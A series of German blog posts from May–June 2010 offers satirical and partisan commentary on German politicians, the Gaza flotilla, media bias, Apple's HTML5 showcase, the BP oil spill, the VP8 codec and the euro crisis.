[l] Wollen wir aus dem "ist das gerecht gegenüber denen, die arbeiten?" nicht mal ein schönes Mem machen? Eine T-Shirt-Kampagne gar? Wollt ihr euch da nicht mal ein schönes Logo ausdenken? Das passt einfach sowas von Faust aufs Auge bei Politikern, Bankern, Bailouts, der EU-Kommission, den "Sparplänen", fast allem! Vielleicht findet ja jemand ein schönes Foto von Frau Köhler mit einem Pferd oder so, um ihre Verbundenheit mit dem einfachen Volk und der Arbeiterklasse zu demonstrieren. Wir müssen da mal was machen jetzt.
Update: Der erste Entwurf kommt rein.
Update: Noch ein paar mehr Entwürfe. Das hier böte sich wahrscheinlich auch als Quelle an.
Update: Nicht Teil unserer Kampagne, schon etwas älter, aber passt irgendwie doch: Guido in Aktion. Sowas schwebte mir ja mit unser Familienministerin vor. Oder von mir aus könnte auch jemand ihre berühmte Kohl-Groupie-Aussage photoshoppen. So ala Jabba + Leia. Den Twi-Lek könnte man ja westerwellen.
Update: Geht weiter. Der hier hat auf einen schön vorwurfsvollen Gesichtsausdruck geachtet, das eignet sich schön als Thread-Illustration bei *chan.
Update: Hier ist noch ein schöner.
Update: Und noch mehr!
Update: Auch Frau von der Leyen hat geeignetes Bildmaterial hinterlassen :-)
Update: Hiernoch ein Instant-Klassiker mit Beckstein (WIE GEIL!!), und hier hat jemand das Köhler-Zensursula-Foto verwurstet. Und hier ist noch ein schöner Guido bei der Arbeit
Update: Und noch zwei. Ich fürchte, ein gutes mit Pferd werden wir nicht kriegen. Sie hat es ja auch selber gesagt.
Update: Noch einer aufm Sofa
Oh übrigens, weil mir Leute schreiben, dass die jetzt Schröder heißt und nicht mehr Köhler: weiß ich. Aber so leicht kommt die mir nicht davon. Ich sage auch noch "Blackwater" und nicht "Xe".
Update: Habe auch mal eines zusammengestümpert :-) Da könnte man bestimmt auch noch einen Ausdrucken-Witz unterbringen.
Update: Hier ist noch einer mit Merkel und hier versucht jemand eine T-Shirtisierung. Ich fürchte, das wird nicht so einfach, daraus ein schönes Shirt zu machen. Wer läuft schon gerne mit einem Shirt mit einem bekennenden Kohl-Groupie herum. Das muss schon ein echt überzeugendes Motiv werden. Ideen?
Hier hat noch jemand die komplette FDP zu einem Gesamtkunstwerk vereint, und hier gibt es noch eine Jogging-Einsendung und hier hat jemand ein Gespräch zwischen Zensursula und Frau Köhler belauscht.
Update: wenn es keine Pferdebilder gibt, muss man sich halt eines photoshoppen :-) Das läuft aber außer Konkurrenz, weil wir die ja mit Dingen beschimpfen wollen, die sie wirklich getan haben.
Update: Hier ist noch ein schöner mit Angie und Arnold und hieraus könnte man vielleicht auch anderweitig was machen. Oh und hier gibt es eine Zensursula mit Pferd und noch eine. Und hier ist noch ein toller Guido.
Update: NEIN WIE GEIL, jemand hat es tatsächlich gemacht! Ladies and Gentlemen, der Kohl-Groupie-Photoshop mit Twi-Lek-Westerwelle!
Update: Letzte Update-Runde (für heute): Guido golft, Kristina und Karl, schönes Party-Bild, LOLCAT (das schreibt man "Schwarz-Geld", sonst wirkt es nicht!), und als T-Shirt-Rohling vielleicht den hier und als Rohmaterial ein Wetten-Dass-Bild.
Update: Und noch ein paar Einsendungen: ein Comic mit Merkel, Jung und Köhler, und hier noch ein Prachtbild mit Angie und Guido bei der Arbeit, hier einer über Griechenland (der braucht noch ein schöneres Bild finde ich) und hier hat jemand Dirk Niebel bei der Arbeit gefilmt. Nein, nicht er hat gearbeitet. Wo denkt ihr hin. Er war in der Nähe von Arbeit.
[l] Erinnert ihr euch daran, dass Tony Blair zum Friedensbotschafter für den Nahen Osten gemacht wurde? 2007? Das war ja schon an sich absurd bis zur geht nicht mehr. Aber hey, ein paar Jahre sind vergangen, vielleicht ist ja ein Wunder geschehen und er macht seine Sache gut? Schaun wir doch mal:
"There are no questions at all. There have been rockets fired from Gaza, there are people in Gaza who want to kill innocent Israelis," the former UK premier said said.
"When it comes to security, I am one hundred percent on Israel's side."
Das macht sich immer gut, wenn ein neutraler Gesandter sich erstmal auf eine Seite im Konflikt stellt.

Tue Jun 8 2010

[l] Lacher des Tages: Wie der "Focus" seine Leserkommentare selektiert. Es ging um einen Artikel über eine "Rentenstudie" des banknahen Lobbyvereins "Deutsches Institut für Altersvorsorge". Dessen Zweck besteht laut Selbstdarstellung hieraus:
Ziel des Instituts ist es, Chancen und Risiken der Altersvorsorge bewusst zu machen und die private Initiative zu fördern.
Auf Deutsch: die veröffentlichen regelmäßig "Studien", dass das öffentliche Rentensystem am Ende ist und man sich dringend eine "private Altersvorsorge" kaufen muss. Dieses Detail hat der "Focus" so gut es ging unter den Tisch fallen lassen (auf Seite 4/4 steht da verschämt "das bankennahe Deutsche Institut für Altersvorsorge"). Der Artikel ist dermaßen unausgewogen, dass man dem "Focus" nur eine große Aufwandsentschädigung gönnen kann, denn das wäre echt peinlich, wenn sie ohne finanzielle Zuwendung so eine offensichtliche Werbung abdrucken.
Weil der "Focus" das offensichtlich aus Versehen versäumt hat, dort klar und deutlich hinzuschreiben, hat sich also ganz altruistisch der Finblog-Autor Andreas Kunze bemüht, denen eine Rüge des Presserates zu ersparen, und diese Information als Kommentar nachzutragen. Der "Focus" hat den Kommentar abgelehnt. Also hat Herr Kunze als zweite Hälfte der Kontrollgruppe eine klebrige Packung Jubelperserei als Kommentar gepostet, und der wurde übernommen. Sportlich, sportlich, lieber "Focus"! SO tief hat schon lange keiner mehr ins Klo gegriffen.
Übrigens, fürs Archiv:
Von FOCUS-Online-Autorin Michaela Hutterer
Ich habe gerade darüber nachgedacht, ob ich einen ZDF-Schleichwerbung-Witz machen soll, da fiel mir auf, dass die Autorin vorher beim ZDF gearbeitet hat. Go figure. Ein anderer Artikel von ihr liest sich für mich auch wie eine Dauerwerbesendung. Und der dort verlinkte Baugeldrechner hat ein Icon, dass er von "MANO Dienste" gemacht wurde. Wenn man mal bei der dort ~~beworbenen~~, äh, interviewten Firma FMH auf die Homepage geht, findet man dort, dass "MANO Dienste" deren "Online-Vermarkter" ist.
Update: Anscheinend lehnt die Software beim "Focus" automatisch Kommentare mit Links drin ab. (Danke, Gerhard)
[l] Ach gucke mal, mein Freund Holgi kommentiert einen fiesen und gemeinen Bashing-Artikel von Johannes Boie gegen ihn und mich und Boies Antwort ist, dass er ja gar nicht Holgi sondern nur mich zu beleidigen versucht hat. Mir ist ja sowas weitgehend wurscht, aber Holgis Formulierungen rocken einfach mal wieder aufs Trefflichste (auch wenn er noch böser, fieser und gemeiner als Johannes ist in seiner Replik).
Wir müssen echt mal wieder eine Radiosendung zusammen machen. :-)
Update: Ich fühle mich von dem Artikel nicht beleidigt. Ich hatte mit Johannes Boie übrigens auch mal ein Interview zur Wikipedia. Das hätte ich ja nicht gemacht, wenn der mir als besonders unangenehm oder unseriös aufgefallen wäre.

Mon Jun 7 2010

[l] Kurzes Update zur Wikileaks-Situation. Zwei spannende Tweets von denen. Erstens dementieren sie, dass ihnen jemand 260.000 geheime Nachrichten von US-Botschaften gegeben hat und zweitens schreiben sie, die Washington Post habe für über ein Jahr auf dem Collateral Murder Video gesessen, ohne es zu publizieren. Das heißt für mich vor allem eines: wenn wir nicht Druck gemacht hätten, hätten sie es auch das 2. Mal nicht publiziert.
Im Übrigen bestätigen sie meine Darstellung, dass sie ihre Quellen selber nicht benennen können. Falls mir das einer nicht geglaubt hat.
[l] Hürriyet veröffentlicht Fotos eines auf der Gaza-Flotte gefangen genommenen israelischen Soldaten. Falls ihr schon immer mal sehen wolltet, wie so ein israelischer Commando aussieht. Ich hab das von hier, wo sie sagen, die Fotos hätten sie von einem Kamera-Flash-Speicher restauriert, nachdem die Israelis alle Fotos gelöscht (bzw offensichtlich nur als gelöscht markiert) hatten. Die Fotos kommen von der islamistischen Hilfsorganisation IHH, die auch die Gaza-Flotille organisiert hatte.
Der Soldat sieht aus, als hätten sie ziemlich auf ihn eingeprügelt.
Update: Wenn man sich diese Darstellung durchliest, klingt das überhaupt nicht wie eine islamistische Organisation. Das sollten wir also mal als Propaganda abhaken. Oh übrigens, weil mich einer angemailt hat, ob ich das Kampfmesser in dem 1. Bild sehe. Ja, sehe ich. Ich sehe auch das Holster am Oberschenkel des Soldaten auf späteren Bildern. Und es hätte mich auch gewundert, wenn der kein Messer dabei gehabt hätte, oder wenn sie ihm das nicht abgenommen hätten.

Sat Jun 5 2010

[l] Ihr erinnert euch bestimmt an "The Front Fell Off!", ein grandioses Fake-Interview von zwei australischen Kabarettisten über ein gesunkenes Schiff. Nun, die beiden haben einen Beitrag über die Sicherheit von Bohrinseln gemacht. Gutes Timing!
Auf Youtube gibt es auch noch ein paar andere großartige Beiträge von denen, z.B. über die Strategie für den Irakkrieg. Großartig! Und hier ist noch einer: Climate Change. Danach braucht ihr neue Unterwäsche vor Lachen :-)
Update: Sie haben auch eines über die Griechenlandkrise. Ganz großes Kino!
[l] Weil hier so viele Zuschriften eingehen wegen des Apple-HTML5-Showcases. Ja, man kann den User Agent ändern, oder man kann diese URL nehmen, die hat die selben Demos und fragt nicht den Browsernamen ab. Hups, sollte Apple da unnötig Browserdiskriminierung betrieben haben auf ihrer Werbeseite für Offenheit im Web?
Aber das Video dort funktioniert nicht. Warum? Weil Apple es absichtlich kaputtgemacht hat. Klickt mal auf die Video-Demo drauf. Spielt nicht. Rechtsklickt mal auf das Video und lasst euch die URL ausgeben. Ist bei mir diese hier. Wenn man sich diese Datei per HTTP holt, kriegt man eine MOV-Datei. MOV, das wissen vielleicht nicht alle, ist die Basis von MP4, nicht zuletzt auf Apples Drängen hin. Dass das .mov heißt, ist also nicht der Grund, wieso Chrome das nicht spielt. Auch nicht der MIME-Type.
Wenn ich mir die Datei per wget hole und mal reingucke, ist die bloß 359 Bytes groß, und beinhaltet einen Redirect auf diese Datei. Leider ist der Redirect relativ, da steht also nur der Dateiname drin, nicht die komplette URL. mplayer kann das übrigens, wenn ihr auf der Kommandozeile
```
mplayer http://movies.apple.com/media/us/html5/showcase/2010/demos/apple-html5-demo-tron_legacy-us-20100601_r848-2cie.mov
```
eingibt, spielt der den Trailer. Bei mir zumindest. Hängt vermutlich auch von der mplayer-Version ab. Aber Chrome unterstützt das halt nicht. Nun, erzeugen wir doch mal eine kleine Datei, die das Video-Tag mit der Ziel-URL des Redirects benutzt: hier. Das spielt Chrome dann plötzlich.
Da der Redirect relativ ist und nicht auf einen anderen Server verlinkt, hat das auch mit CDN-Optimierung o.ä. nichts zu tun. Der Redirect erfüllt genau keinen Zweck (außer Chrome auszuschließen). Für den Benutzer ergibt es einen zusätzlichen HTTP Round Trip, für Apple bedeutet es einen HTTP-Zugriff mehr, d.h. mehr Netzwerkkosten und mehr Serverlast. Nicht viel, aber doch vorhanden.
Also, liebe Apple-Apologeten. Dann erklärt mir doch mal, wieso Apple das macht. Außer natürlich, um uns alle zum Installieren von Quicktime zu zwingen? Na? Fällt euch auch nichts ein? Na sowas.
Das gilt übrigens für die gesamte Apple-Trailer-Site. Wieso benutzt das noch Quicktime und nicht HTML5-Video, wenn Apple angeblich so ein Verfechter offener Standards ist? Weil es da nie um die Trailer ging. Sondern um Quicktime-Installationsbasis.
Update: Oh übrigens, ein besonders zynischer Leser hat mir dieses hilfreiche Schaubild gemailt :-)
Update: Eine Sache will ich auch mal sagen: die Demos sind visuell ziemlich geil, die Apple da gemacht hat.
[l] Das nächste Boot ist auf dem Weg nach Gaza, und diesmal haben sie eine Friedensnobelpreisträgerin an Bord, und den früheren Chef des UNO Oil-for-Food-Programms im Irak. Die Frau hat sich schon häufiger mit Israel angelegt und saß da auch schon im Gefängnis. Mal schauen, ob sie dieses Mal wieder wild losballern. Das Schiff haben sie Rachel Corrie genannt, nach einer Amerikanischen Aktivistin, die sich in Israel vor einen Bulldozer gestellt hat, um zu verhindern, dass der Palästinensische Wohnhäuser plattmacht. Der Bulldozer hat dann sie und die Wohnhäuser plattgemacht. Die Bulldozer hat übrigens Caterpillar gebaut.
Und was passiert? Die Israelische Armee hat das Boot gekapert und entführt es jetzt nach Ashdod. Immerhin haben sie die Passagiere anscheinend nicht verletzt.

Thu Jun 3 2010

[l] Angeblich ist Wulff jetzt der Vorreiter für die Köhler-Nachfolge. Immer daran denken: das ist der Mann, der Uwe Schünemann zum Innenminister gemacht hat. Mehr muss man zu dem nicht sagen. Na gut, einen noch:
Wulff hatte sich selbst ins Spiel gebracht.
Wie erbärmlich!
Aber der Artikel hat ein anderes Highlight. Da schreiben sie nämlich, warum es nicht Zensursula wird. Achtung, das ist episch, das hat geradezu biblische Dimensionen:
Offenbar stieß eine Kandidatur von der Leyens in Teilen der CDU auf heftigen Widerstand. Zwei protestantische Frauen seien an der Spitze der Regierung und des Staates in den ohnehin enttäuschten konservativen Kreisen der Partei schwer vermittelbar, ist in Fraktionskreisen zu hören.
Da seht ihr es. Sie ist nicht ausgeschieden, weil sie keine Ahnung hat, weil sie inkompetent ist, weil ihre Internetzensurbemühungen eigenhändig die CDU in die Umfragekrise gestürzt hat. Nein. Weil sie eine protestantische Frau ist. Deshalb nicht. Das muss man sich mal auf der Zunge zergehen lassen. Die Schwarze Pest ist immer NOCH schlimmer als ich eh schon annahm.
Oh, einen hab ich noch:
In der ansonsten wenig schillernden Ministerriege ist sie mit Verteidigungsminister Karl-Theodor zu Guttenberg das populärste Regierungsmitglied.
Der Rest der CDU ist nämlich noch schlimmer! Sogar eine blasse Gestalt wie der Wulff ist noch unpopulärer als Zensursula. (Danke, Nusret)

Wed Jun 2 2010

[l] Die Israelische Armee hat an Bord der Flotille lauter fiese Terroristen gefunden.
Dozens of passengers who were aboard the Mavi Marmara Turkish passenger ship are suspected of having connections with global jihad-affiliated terrorist organizations, defense officials said on Tuesday, amid growing concerns that Turkish warships would accompany a future flotilla to the Gaza Strip.
Geht es noch ein bisschen vager? "suspected", dass ich nicht lache. Aber der letzte Teil ist schon spannend. Das wäre ja mal abgefahren, wenn die Türkei in der Tat ihre Marine als Geleitschutz mitschickt das nächste Mal. Ich bin mir nicht sicher, ob die Türkei schon angepisst genug ist dafür.
Oh und noch was haben sie gefunden:
During its searches of the Mavi Marmara on Tuesday, the military also discovered a cache of bulletproof vests and night-vision goggles, as well as gas masks.
Das kann ich ja nicht verstehen. Wenn ich schon IDF wäre und da "Waffen finden" würde, dann würde ich da doch richtige Waffen finden und nicht so ein Geklump. Ich muss da immer daran denken, wie Putin damals meinte, als Bush keine WMD gefunden hat: "Also ICH hätte WMD gefunden, wenn ich da vorher so einen Wind drum gemacht hätte". :-)
Aber da sieht man mal: die Frage stellt sich, wie angepisst die Türkei gerade ist. Um das zu illustrieren, habe ich eine schöne Verschwörungstheorie aus der Türkei. Da gab es nämlich am gleichen Tag wie das Flotillenmassaker noch einen PKK-Angriff auf eine Marinebasis. Und das kommt nicht nur mir ein bisschen komisch vor, dass die PKK genug Bumms hat, um eine Marinebasis anzugreifen. Und die haben dabei richtig Schaden gemacht:
[…] bei einem Angriff auf einen Stützpunkt der Marine sechs Soldaten getötet und mindestens sieben verletzt.
Die PKK hat auch vorher noch nie eine Marinebasis angegriffen. Wäre ja auch so das letzte, was man angreifen würde als Widerstandskämpfer/Terroristen. Da würde man doch eher nach weniger geschützter Infrastruktur suchen. Und in der Türkei stellen sich jetzt einige die Frage, ob das Timing ein Zufall war, oder ob Israel der PKK geholfen haben könnte. Ich kann kein Türkisch und Google Translate scheint gerade kaputt zu sein, daher übernehme ich die Inhaltsangabe von dem Einsender. Hier ist noch eine Meldung dazu.
Nun halte ich das inhaltlich für nicht stichhaltig, aber dass solche Theorien kursieren, das zeigt deutlich, dass die Türken gerade echt schlecht gelaunt sind.
Update: Die Flotillen-Passagiere sind wieder zuhause, und erzählen der Presse, was da gelaufen ist.
"We expected them to shoot people in the legs, to shoot in the air, just to scare people, but they were direct," she said, in a separate interview with the Folha de São Paulo newspaper. "Some of them shot in the passengers' heads. Many people were murdered – it was unimaginable."
Update: Ach guckt mal, Israels Armee hat ein Video der Waffen veröffentlicht. Also wenn das keine gefährlichen Massenvernichtungswaffen sind, dann weiss ich auch nicht. Besonders dieser Kasten mit Geschirr, den fand ich sehr beeindruckend. Und der Massenvernichtungswasserschlauch, mit dem sie da bespritzt werden! Ein Wunder, dass die Soldaten überhaupt überlebt haben! Also unter solchen Umständen ist so ein Massaker ja wohl voll gerechtfertigt! Es erinnert ein bisschen hieran.
Update: Die Site hier hat mal auf die EXIF-Daten der Beweisfotos der IDF geguckt, und da je nach Bild 2003-2006 gefunden. m(
Update: Die EXIF-Daten können auch aus anderen Gründen falsch sein, z.B. weil der Akku alle war. Und wenn die Bilder komplett gestellt wären, dann hätten sie wahrscheinlich ne AK47 dazugetan, um die Gefährlichkeit der Terroristen zu beweisen.
[l] Ich habe heute beim Auditieren ein sehr cooles Code-Mem gefunden. Es ist in C++ mit ein paar Makros. Man sagt im Code sowas wie
```
FINALLY(callfreeonpointer, someptr);
```
Über Makro- und Template-Magie wird daraus dann die Deklaration einer Template-Klasse mit eindeutig generiertem Namen (über __LINE__), deren Destruktur callfreeonpointer(someptr) aufruft.
Update: Will das nicht mal jemand auf die C++0x Lambda Expressions ausweiten?
Update: Mir mailt gerade jemand, dass das Konzept Scope Guard heißt, und u.a. in der LOKI Library implementiert ist, Google-Stichwort LOKI_ON_BLOCK_EXIT.
Update: Hat mal jemand gemacht mit C++0x Lamba-Ausdrücken.

Tue Jun 1 2010

[l] Ich habe eine neue Theorie, wo der Koch jetzt hingeht. Zur GEMA. Guckt euch mal diese Pressemitteilung hier an, insbesondere den letzten Absatz:
„Für die GEMA ist es besonders wichtig, den Fall lückenlos aufzuklären. Wir legen großen Wert auf Transparenz und eine offene Kommunikation – soweit das bei laufenden Ermittlungen möglich ist. Zum aktuellen Zeitpunkt können wir davon ausgehen, dass es sich um einen beispiellosen Einzelfall, der keineswegs Rückschlüsse auf das gesamte System der GEMA zulässt, handelt.“
Also erstmal… der letzte Satz… Arsch auf Grundeis. Au weia. Aber das davor bringt mich zu der Koch-Vermutung. "lückenlose Aufklärung". Das schreit doch geradezu nach jemandem, der sich mit brutalstmöglicher Aufklärung auskennt! Und da fällt mir nur einer ein.

Mon May 31 2010

[l] Das wird euch jetzt sicher genau so schockieren wie mich: Betrugsverdacht in der GEMA, GEMA stellt Strafanzeige.
Der mögliche Betrugsfall, in den vermutlich auch zwei Mitarbeiter der Generaldirektion der GEMA in Berlin verwickelt sind, entstand durch mutmaßlich falsche Programmangaben für Veranstaltungen von Live-Musik-Aufführungen, die der GEMA als Grundlage für die Berechnung der Tantiemen zu Gunsten der berechtigten Autoren und Verleger eingereicht wurden.

Fri May 28 2010

[l] Vor 31 Jahren hat die Vorgänger-Firma von Transocean schonmal einen fetten Öl-Blowout im Golf von Mexiko gehabt. Das ist mal ein beeindruckender Deja-Vu. Sie haben die selben Dinge probiert, und sie sind auch alle fehlgeschlagen. Am Ende haben sie das Leak geschlossen (nach NEUN MONATEN), indem sie eine zweite Bohrung gemacht haben, um den Druck wegzunehmen, ein sogenanntes Relief Well.
So und jetzt guckt euch mal diese Meldung hier an. In Kanada ist es nämlich Gesetz, dass die Ölfirmen gleich ein Relief Well mitbohren müssen, damit man im Spill-Notfall was retten kann. Und es passiert genau das, was man erwarten würde: BP betreibt Lobbyismus dagegen.
[l] Hier kommen gerade diverse Kommentare zu dem Mode-TED-Talk von gestern rein. Ich will da mal der Reihe nach was zu sagen.
1. "Die Textilindustrie lebt von der Ausnutzung von Kindern in der 3. Welt".
  Ach und die anderen Industrien nicht? Habt ihr mal auf eure Computer geguckt, in welchen Ländern die Teile hergestellt werden? Im Übrigen suhlen sich Künstler auch nicht gerade in ihren Geldbergen. Im Gegenteil sehe ich hier eine klare Parallele. In beiden Fällen macht eine Industrie aus Mittelmännern Profit auf Kosten von denen, die tatsächlich die Arbeit machen. Im Übrigen geht es in dem Talk um Umsatz, nicht Profit.
2. "Bei Software gibt es keine Verfielfältigungskosten".
  Doch. Die sind nur sehr gering. Genau wie bei Textilien. Die könnte man nämlich auch verschenken. Warum? Weil der Transport und das Logo-Aufnähen durch Langzeitarbeitslose in Bulgarien fett subventioniert werden, u.a. von der EU. Merke: erst informieren, dann faseln.
3. "Boah der Fefe ist ja voll reingefallen".
  Ich habe mir die Argumentation des Talks überhaupt nicht zu eigen gemacht, ich habe nur darauf hingewiesen, dass ihr ihn gucken sollt, und habe den Inhalt kurz zusammengefasst. Leute, mit so wenig Lesekompetenz seid ihr vielleicht doch bei Axel Springer besser aufgehoben.

Thu May 27 2010

[l] Der eine oder andere hat sich vielleicht Sorgen gemacht, dass Transocean (der Betreiber der Bohrinsel) jetzt einen großen Schaden hat. Müßt ihr nicht, die machen sogar 270 Millionen Dollar Gewinn. Die haben die Bohrinsel nämlich überversichert.
Oh, wo wir gerade bei Transocean waren, deren Wikipedia-Seite ist auch aufschlußreich. Ich hatte mich ja gewundert, wieso eine Bohrinsel-Firma ausgerechnet in der Schifffahrtsnation Schweiz sitzt. Stellt sich raus, dass die ursprünglich aus Alabama sind, später dann nach diversen Firmenfusionen (u.a. mit einer Walfangfirma aus Norwegen) ihren Firmensitz von den Cayman-Inseln in die Schweiz verlegt. Das gibt ja gleich noch mal Sympathiepunkte.
Aber auch für den Fall, dass die da jetzt einen fetten Cleanup aufgedrückt kriegen, haben sie vorgesagt, und am 12. Mai erstmal angefangen, den Papierkram für eine fette Auszahlung an ihre Aktionäre klarzumachen. Denn man kann nicht für Cleanup ausgeben, was man schon an die Aktionäre ausgezahlt hat.

Wed May 26 2010

[l] Auf der SIGINT ging es u.a. um die Volkszählung 2011. Lest euch mal die Folien durch, sind auf der Seite verlinkt. Das ZDF hat berichtet, allerdings mit der Falschdarstellung, dass es bei der Volkszählung nur um 10% der Bevölkerung ginge. Fakt ist, dass die gesamte Bevölkerung per Datenbankzusammenführung gerasterfahndet wird, und die 10% nur für Stichproben-Kontrollen da sind, zusätzlich. Als Scytale (der auch den Vortrag gemacht hat) mal beim ZDF nachgefragt hat, kam da erst gar nichts und dann war der Artikel plötzlich gelöscht. Hier gibt es einen Screenshot von vor dem Löschen.
Nun kann das alles nichts weiter heißen, aber es bietet sich eben auch die Verschwörungstheorie an, dass sie da bei der Beschwichtigungs- und Abwiegel-Propaganda erwischt wurden und die Spuren vernichten wollten. Gut, dass wir GEZ-Gebühren bezahlen, damit das Fernsehen schön unabhängig ist!

Mon May 24 2010

[l] Die Terroristen werden auch immer jünger. Jetzt haben die Amis einen 14jährigen autistischen Schüler mit einem IQ von 75 als Terroristen erkannt, weil er eine Zeichnung von einer Waffe gemacht hat, die auf seinen Lehrer gerichtet war. Völlig klar, eine Bedrohung für Leib und Leben!1!!

Sun May 23 2010

[l] Horst Köhler hat gerade mal Tacheles geredet bezüglich der Bundeswehr. Hier ist, was er dem Deutschlandfunk gesagt hat:
Allerdings müsse Deutschland mit seiner Außenhandelsabhängigkeit zur Wahrung seiner Interessen im Zweifel auch zu militärischen Mitteln greifen. Als Beispiel für diese Interessen nannte Köhler ‘freie Handelswege’. Es gelte, Zitat ‘ganze regionale Instabilitäten zu verhindern, die mit Sicherheit dann auf unsere Chancen zurückschlagen’ und sich somit negativ auf Handel und Arbeitsplätze auswirkten.
Habt ihr das gelesen? Bundeswehreinsatz für freie Handelswege. Hat er damit Somalische Piraten gemeint oder Länder mit zu hohen Zöllen?
Naja, immerhin hat er es dem Deutschlandradio gesagt, da ist es ja dann on-the-record. Hier ist die Meldung. Beim Freitag hat auch jemand was geblogt dazu.
Damit haben wir uns dann wohl von der bisherigen Praxis verabschiedet, was von Völkerverständigung, Menschenrechten und humanitären Einsätzen zu faseln.
So unglaublich das ist, wie der Köhler sich und uns da demaskiert hat, so gibt es doch auch einen positiven Aspekt. Es bringt ein bisschen Ehrlichkeit in die Debatte.
Update: Nota bene: Das Deutschlandradio hat das Interview nachträglich gekürzt. Ich vermute mal, dass der Zensor von der Pinkelpause zurückgekommen ist :-)
Update: Hier gibt es das volle Interview als mp3 (haben mir Leute gemailt, habe ich nicht geprüft).

Fri May 21 2010

[l] Habt ihr euch auch schon mal gefragt, wieso die Briten so viele furchtbare Gesetze und das ganze Überwachungs-Zeugs als Gesetze machen? Jetzt gibt es einen guten Hinweis, warum das so ist. Weil die im Parlament (!!) Lobby-Werbefilme wie diesen hier gezeigt kriegen. Und BOAH ist das übel! Meine Fresse. Das muss man sich in Ruhe angucken, am besten nicht nur einmal. So einen schönen Einblick in Lobbyismus kriegt man selten. Ich wette, dass das auf EU-Ebene genauso abläuft. Wir in Deutschland haben das natürlich schon weiter optimiert, bei uns schreiben die Lobbyisten direkt die Gesetze in den Ministerien. Public-Private-Partnership. Hat der Schröder so eingeführt.
Update: Nach der erfreulich hohen Resonanz an Leuten, die es herausgefunden und mir gemailt haben: das ist ein Hoax. Sieht man am einfachsten daran, dass es die Domain blackwellbriggs.com erst seit Ende März gibt. Ein Leser hat sogar Hinweise darauf gefunden, dass das eine virale Marketingkampagne von Nokia ist.
Update: Guckt euch auch mal das hier an, die sind schon erstaunlich weit gegangen für ihren Hoax. (Danke, Thomas)
[l] Die Chemikalie, die BP gegen das Öl einsetzt, ist giftiger als das Öl selbst.
Inzwischen wird klar, wie giftig die von BP eingesetzte Chemikalie zur Ölzersetzung ist: Immer mehr Fischer, die beim Kampf gegen die Ölpest halfen, werden krank.
[…]
In einer anderen Frage haben die Behörden inzwischen gehandelt: die nationale Umweltbehörde hat der Ölfirma BP verboten, weiter die bisher benutzten Chemikalien zu verwenden, um das Öl zu zersetzen. Millionen Liter davon wurden bereits auf der Wasseroberfläche und unter Wasser versprüht, jetzt sollen weniger giftige Mittel eingesetzt werden. Experten hatten schon seit Tagen gewarnt, diese Chemikalien könnten schlimme Folgen haben für die Tierwelt – und auch für Menschen.
Das Zeug haben sie schon früher eingesetzt, bei der Exxon Valdez, und auch da hat das schon furchtbare Wirkung auf die Fauna gehabt:
"Nach der Ölpest bei der Exxon Valdez haben wir Seelöwen und Seeotter gefunden, denen praktisch das Gehirn weggebrannt war", warnt die Biologin. Damals wurde ebenfalls eine Version des Mittels Corexit eingesetzt.
Übrigens, BP sitzt im Aufsichtsrat des Corexit-Produzenten Nalco. Die versuchen also, mit der Ölpest noch Profit zu machen. Nalco hat schon 40 Mio Dollar Umsatz gemacht durch die Ölpest. (Danke, Christian)

Wed May 19 2010

[l] Sehr gute Nachrichten: Google opensourced VP8, um einen freien Web-Video-Codec zu schaffen. Damit hatten ja schon alle gerechnet, als Google On2 gekauft hat, den Hersteller von VP8. VP8 ist meiner Einschätzung nach im Moment noch nicht wirklich konkurrenzfähig, weil die H.264-Infrastruktur inzwischen sehr weit ist bei Open Source, dank ffmpeg und x264. Ich hoffe, dass die x264-Leute sich des Codecs annehmen und daraus einen genau so fetten Codec machen, wie sie aus H.264 gemacht haben (wo x264 alle kommerziellen Encoder derartig deutlich plattmacht, dass es eine Freude ist). H.264 wäre nicht so auf der Landkarte, wie es es heute ist, wenn es nicht so einen hervorragenden Encoder kostenlos gegeben hätte.
Es ist gar nicht überzubewerten, was das für ein wichtiger Schritt für uns alle ist. Google als Betreiber von Youtube weiß ja auch, dass bis 2012 eine Übergangsfrist läuft, in der sie auf Lizenznerv verzichten können. Und bis dahin muss mal eine Alternative her. Und Google sitzt nicht nur wegen Chrome, sondern auch wegen Youtube am fettesten Hebel im Internet. Wenn die umstellen, dann werden die Browser-Hersteller alle folgen. Und tatsächlich haben sie zum Launch schon Firefox und Opera als Partner gewonnen. IE kann man mit Chrome Frame abbügeln. Bleibt nur Safari, und die paar Apple-Spacken fallen in der Statistik ja eh nicht weiter auf, wenn die keine Videos mehr kriegen. Merken die eh nicht, die haben ja auch nicht gemerkt, wie scheiße der Quicktime-H264-Encoder ist.
Rein technisch gesehen ist natürlich nicht alles Gold, was glänzt. Aber ich hoffe trotzdem, dass die x264-Leute das übernehmen und daraus einen Goldesel für uns alle bauen. Vor allem haben die auch das Knowhow, um die Spec so zu ändern, dass sie Patente vermeidet.
Update: Microsoft will in IE9 auch WebM supporten (WebM ist der Marketingname für VP8)
[l] OK, das geht so nicht weiter. Was da gerade an Verschwörungstheorien verbreitet wird, von offizieller Stelle auch noch, oder wie hier von "Experten", das ist nicht zum Aushalten. Der Tenor: die fiesen bösen gemeinen Hedgefonds machen den Euro kaputt. Der Hickel geht dabei noch weiter als die anderen Spezialexperten, die diese Theorie bringen:
Der Euro steht derzeit Zeit massiv unter Druck, weil die Spekulanten das gesamte System zu sprengen versuchen. Es geht nicht mehr nur um einen begrenzten Krisenfall, wie beispielsweise Griechenland. Die Spekulanten versuchen inzwischen mit viel Macht das gesamte Eurosystem aufzuspalten und am Ende aufzulösen.
Klaaaaaaaar. Weil die Spekulanten davon welchen Vorteil haben? Na? Keinen? Wunderbar! Und in welcher Währung lassen die sich ihre Profite auszahlen, wenn Dollar und Euro um die Wette abstürzen? Die Idee, dass Hedgefonds eine Agenda der Zerstörung der Eurozone haben, ist lächerlich, geradezu grotesk.
Aber überlegt euch das mal selber. Wir haben gerade ein Hilfspaket von 750 Milliarden Euro aufgelegt. Geld, das wir nicht haben. Wir drucken also mal eben 750 Milliarden Euro. Was bewirkt das? Inflation, natürlich! Wie immer, wenn man die Geldmenge erhöht, ohne dass sich die Werte dahinter erhöhen. Dann wird das einzelne Geldstück weniger wert.
Wir haben also gerade als offizielle Politik Inflation gemacht, und es wirkt! Der Euro ist von 1.36 auf 1.23 gefallen gegenüber dem Dollar. Wir mussten das übrigens machen. Denn China, unser Hauptkonkurrent, hat seine Währung an den Dollar geklebt. Wenn der Dollar fällt, fällt auch der Yuan. Das macht China, damit sie weiterhin billigen Schund an die USA exportieren kann. Denn ansonsten würde der Preis ihrer Güter in den USA steigen, und es wäre nicht mehr billiger Schund, sondern nur noch Schund, und keiner würde es mehr kaufen.
